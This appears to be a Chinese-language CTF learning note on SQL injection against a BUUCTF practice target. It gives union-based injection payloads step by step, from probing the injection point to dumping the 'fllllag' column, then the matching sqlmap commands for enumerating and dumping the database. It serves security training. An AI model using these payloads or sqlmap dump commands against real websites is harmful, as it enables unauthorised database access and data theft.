第一次探索sql注入


1.确定是否存在注入点

 1' and 1=2--+


2.确定表的字段多少  确定为三个字段

 id=1' order by 5 %23

 id=1' order by 3 %23


3.确定回显 为2,3 位

 id=1' union select 1,2,3 %23

 id=1' union select 1,2,3 limit 1,1 %23


4.确定用户名和 系统版本号 回显:root  ubuntu  

 id=1' union select 1,user(),version() limit 1,1 %23


5.确定数据库名称 回显:note

 id=1' union select 1,2,database() limit 1,1 %23


6.确定元数据库中存在的表 发现两个表,一个是fl4g(大概率)一个是notes

 id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' limit 1,1 %23


7.确定列名:fllllag

 id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' limit 1,1 %23


8.确定用户名及mima(三个字段)

id=1' union select 1,2,group_concat(fllllag) from fl4g limit 1,1 %23


使用sqlmap

1.sqlmap测试是否有注入点:  

 sqlmap.py -u "URL"


 sqlmap -u "http://3dbb6563-133d-4279-a624-b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1"


2.判断当前用户是否为数据库管理员

 sqlmap.py -u "URL" --is-dba


 sqlmap -u "http://3dbb6563-133d-4279-a624-b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --is-dba


3.获取当前用户

 sqlmap.py -u "URL" --user


 sqlmap -u "http://3dbb6563-133d-4279-a624-b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --user


4.获取站点中所有的数据库

 sqlmap.py -u "URL" --dbs


 sqlmap -u "http://3dbb6563-133d-4279-a624-b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --dbs


5.获取当前数据库显示:note

 sqlmap.py -u "URL" --current-db


 sqlmap -u "http://3dbb6563-133d-4279-a624-  b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --current-db


6.获取note数据库中所包含的数据表显示:fl4g

 sqlmap.py -u "URL" --tables -D "note"


 sqlmap -u "http://3dbb6563-133d-4279-a624-b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --tables -D "note"


7.获取note数据库的fl4g表中所包含的字段

 sqlmap.py -u "URL" --columns -T "fl4g" -D "note"


 sqlmap -u "http://3dbb6563-133d-4279-a624-b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --columns -T "fl4g" -D "note"


8.导出note数据库fl4g表fllllag字段中的数据

 sqlmap.py -u "URL" --dump -C "fllllag" -T "fl4g" -D "note"


 sqlmap -u "http://3dbb6563-133d-4279-a624-b8f52b04e5e0.node4.buuoj.cn:81/index.php?id=1" --dump -C "fllllag" -T "fl4g" -D "note"